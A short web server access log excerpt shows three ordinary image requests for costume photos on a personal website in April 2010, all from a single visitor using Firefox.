90.182.6.34 - - [16/Apr/2010:11:48:09 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.1" 200 18435 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:09 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.1" 200 17118 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:10 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.1" 200 17016 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
